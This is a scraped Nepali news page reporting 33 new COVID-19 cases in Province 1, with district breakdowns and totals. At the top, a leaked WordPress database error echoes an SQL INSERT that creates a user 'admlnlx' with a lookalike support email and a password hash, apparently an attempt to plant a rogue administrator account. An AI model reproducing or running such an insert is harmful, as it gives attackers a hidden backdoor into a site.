WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtoVMwjLQRjSjiQbX6f/zrfUu9BQar/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:50:45', '', 'admlnlx', 'admlnlx')

३३ कोरोना सङ्क्रमित थपिए – Gaule Khabar

३३ कोरोना सङ्क्रमित थपिए

३३ कोरोना सङ्क्रमित थपिए

विराटनगर । प्रदेश नं १ मा पछिल्लो २४ घण्टामा ३३ कोरोना सङ्क्रमित थपिएका छन् । प्रदेशमा सो अवधिमा गरिएको २९४ जनाको पिसीआर परीक्षणमा ११ महिला र २२ पुरुषको रिपोर्ट पोजेटिभ आएको सामाजिक विकास मन्त्रालयले जनाएको छ । थप हुनेमा मोरङमा १८ मध्ये विराटनगरमा १४, झापामा आठ, भोजपुरमा तीन, सुनसरी र उदयपुरमा दुई÷दुई सङ्क्रमित देखिएका छन् ।
प्रदेशमा सङ्क्रमितको सङ्ख्या ३० हजार ५६५ पुगेका मध्ये २९ हजार ८७८ निको भएका छन् । हाल सक्रिय सङ्क्रमित २१५ छन् । प्रदेशमा हालसम्म दुई लाख ३४ हजार ४५५ जनाको पिसीआर परीक्षण कार्य सम्पन्न भइसकेको छ । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका